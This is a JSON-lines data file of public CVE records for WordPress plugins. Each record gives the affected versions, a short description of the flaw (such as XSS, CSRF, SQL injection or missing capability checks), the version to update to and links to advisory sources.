{"CVE_ID":"CVE-2023-1087","slug":"wc-sales-notification","versionEndExcluding":"1.2.3","description":"The WC Sales Notification WordPress plugin before 1.2.3 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356c89a1-81b6-4600-9291-1a74788af7f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356c89a1-81b6-4600-9291-1a74788af7f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2308","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link in the EliSlider in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8031","slug":"secure-downloads","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Secure Downloads WordPress plugin before 1.2.3 is vulnerable does not properly restrict which files can be downloaded. This makes it possible for authenticated attackers, with admin-level access and above, to download arbitrary files that may contain sensitive information like wp-config.php.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6f54e6f-0a50-424f-ae3a-00b9880d9f13\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6f54e6f-0a50-424f-ae3a-00b9880d9f13\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11880","slug":"b-testimonial","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The B Testimonial \u2013 testimonial plugin for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'b_testimonial' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-testimonial\\\/tags\\\/1.2.2\\\/inc\\\/theme\\\/one.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-testimonial\\\/tags\\\/1.2.2\\\/inc\\\/theme\\\/one.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200155\\\/b-testimonial\\\/trunk\\\/inc\\\/theme\\\/one.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200155\\\/b-testimonial\\\/trunk\\\/inc\\\/theme\\\/one.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200155%40b-testimonial&new=3200155%40b-testimonial&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200155%40b-testimonial&new=3200155%40b-testimonial&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea251110-02fa-4f4e-a578-855d3331b200?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea251110-02fa-4f4e-a578-855d3331b200?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5030","slug":"cm-table-of-content","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The CM Table Of Contents  WordPress plugin before 1.2.3 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c2e994c-31bd-4de4-9480-b86f980d4130\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c2e994c-31bd-4de4-9480-b86f980d4130\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5957","slug":"guest-support","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Guest Support \u2013 Complete customer support ticket system for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'deleteMassTickets' function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to delete arbitrary support tickets.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/ajax.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/ajax.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/class-dbquery.php#L736\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/class-dbquery.php#L736\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3322664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3322664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e5dde2-f9f9-4a64-9174-e5e6e9fe1b23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e5dde2-f9f9-4a64-9174-e5e6e9fe1b23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12713","slug":"sureforms","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the handle_export_form() function due to a missing capability check. This makes it possible for unauthenticated attackers to export data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215338\\\/sureforms\\\/tags\\\/1.2.3\\\/inc\\\/export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215338\\\/sureforms\\\/tags\\\/1.2.3\\\/inc\\\/export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d5fa7-08fc-402a-bcac-b2dff87de861?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d5fa7-08fc-402a-bcac-b2dff87de861?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24666","slug":"hyve-lite","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeIsle AI Chatbot for WordPress \u2013 Hyve Lite allows Stored XSS. This issue affects AI Chatbot for WordPress \u2013 Hyve Lite: from n\/a through 1.2.2.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hyve-lite\\\/vulnerability\\\/wordpress-hyve-lite-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hyve-lite\\\/vulnerability\\\/wordpress-hyve-lite-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13701","slug":"stklcode-liveticker","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Liveticker (by stklcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'liveticker' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234940%40stklcode-liveticker&new=3234940%40stklcode-liveticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234940%40stklcode-liveticker&new=3234940%40stklcode-liveticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4edf78c-cd17-42dd-90dc-10946e79d57b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4edf78c-cd17-42dd-90dc-10946e79d57b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13718","slug":"flexible-wishlist","versionImpact":"1.2.26","versionEndExcluding":"1.2.27","description":"The Flexible Wishlist for WooCommerce \u2013 Ecommerce Wishlist & Save for later plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.26. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to modify\/update\/create other user's wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=flexible-wishlist\\\/tags\\\/1.2.26&new_path=\\\/flexible-wishlist\\\/tags\\\/1.2.27&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=flexible-wishlist\\\/tags\\\/1.2.26&new_path=\\\/flexible-wishlist\\\/tags\\\/1.2.27&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f2b4030-92b1-4795-b72e-761632dd523d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f2b4030-92b1-4795-b72e-761632dd523d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6555","slug":"email-subscribe","versionImpact":"1.2.19","versionEndExcluding":"1.2.20","description":"The Email Subscription Popup WordPress plugin before 1.2.20 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58803934-dbd3-422d-88e7-ebbc5e8c0886\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58803934-dbd3-422d-88e7-ebbc5e8c0886\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2578","slug":"ameliabooking","versionImpact":"1.2.19","versionEndExcluding":"1.2.20","description":"The Booking for Appointments and Events Calendar &#8211; Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.19 via the 'wpAmeliaApiCall' function. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/ameliabooking.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/ameliabooking.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/src\\\/Application\\\/Commands\\\/Entities\\\/GetEntitiesCommandHandler.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/src\\\/Application\\\/Commands\\\/Entities\\\/GetEntitiesCommandHandler.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261318\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261318\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6806e07b-96bf-43ad-a3ac-2105e7449e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6806e07b-96bf-43ad-a3ac-2105e7449e3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6684","slug":"ibtana-visual-editor","versionImpact":"1.2.2","versionEndExcluding":"1.2.2.1","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ive' shortcode in versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on 'width' and 'height' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b09d496-0e03-48a4-acf7-57febe18ed0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b09d496-0e03-48a4-acf7-57febe18ed0a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php?rev=2965648#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php?rev=2965648#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3006647\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3006647\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6063","slug":"wp-fastest-cache","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a74105-8ade-4198-abe2-1c6f2967443e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a74105-8ade-4198-abe2-1c6f2967443e\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"counter-box","versionEndExcluding":"1.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11806","slug":"pkt1-centro-de-envios","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The PKT1 Centro de envios plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'success' and 'error' parameters in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pkt1-centro-de-envios\\\/trunk\\\/views\\\/admin\\\/settings_page.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pkt1-centro-de-envios\\\/trunk\\\/views\\\/admin\\\/settings_page.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c924b317-97ec-43b8-9bf3-ed7618743de7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c924b317-97ec-43b8-9bf3-ed7618743de7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2568","slug":"vayu-blocks","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the 'vayu_blocks_get_toggle_switch_values_callback' and 'vayu_blocks_save_toggle_switch_callback' function in versions 1.0.4 to 1.2.1. This makes it possible for unauthenticated attackers to read plugin options and update any option with a key name ending in '_value'.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263702\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263702\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27ca93a1-3dfc-4bbd-834a-1c04d9e22ebf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27ca93a1-3dfc-4bbd-834a-1c04d9e22ebf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4702","slug":"mega-elements-addons-for-elementor","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Mega Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3808ca2a-e78e-4118-890b-c22a71f8e855?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3808ca2a-e78e-4118-890b-c22a71f8e855?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085457\\\/mega-elements-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085457\\\/mega-elements-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0282","slug":"yourchannel","versionEndExcluding":"1.2.2","description":"The YourChannel WordPress plugin before 1.2.2 does not sanitize and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93693d45-5217-4571-bae5-aab8878cfe62\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93693d45-5217-4571-bae5-aab8878cfe62\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1760","slug":"core-control","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Core Control WordPress plugin through 1.2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7906b1d-25c9-4f34-bd02-66824878b88e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7906b1d-25c9-4f34-bd02-66824878b88e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12201","slug":"hash-form","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check when creating form styles in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create new form styles.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205245%40hash-form&new=3205245%40hash-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205245%40hash-form&new=3205245%40hash-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb81b2ce-583b-411c-b0f5-a233e0d1986b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb81b2ce-583b-411c-b0f5-a233e0d1986b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9541","slug":"news-kit-elementor-addons","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The News Kit Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the render function in includes\/widgets\/canvas-menu\/canvas-menu.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169975\\\/news-kit-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169975\\\/news-kit-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0362","slug":"themify-portfolio-post","versionEndExcluding":"1.2.2","description":"Themify Portfolio Post WordPress plugin before 1.2.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95ee3257-cfda-480d-b3f7-28235564cf6d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95ee3257-cfda-480d-b3f7-28235564cf6d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4798","slug":"user-avatar-reloaded","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The User Avatar WordPress plugin before 1.2.2 does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/273a95bf-39fe-4ba7-bc14-9527acfd9f42\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/273a95bf-39fe-4ba7-bc14-9527acfd9f42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12466","slug":"proofreading","versionImpact":"1.2.1.1","versionEndExcluding":"1.2.2","description":"The Proofreading plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 1.2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/proofreading\\\/tags\\\/1.2.1.1\\\/admin\\\/partials\\\/proofreading-admin-display.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/proofreading\\\/tags\\\/1.2.1.1\\\/admin\\\/partials\\\/proofreading-admin-display.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223417%40proofreading&new=3223417%40proofreading&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223417%40proofreading&new=3223417%40proofreading&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f666a3-6287-4c9b-94d3-7bc457701af2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f666a3-6287-4c9b-94d3-7bc457701af2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
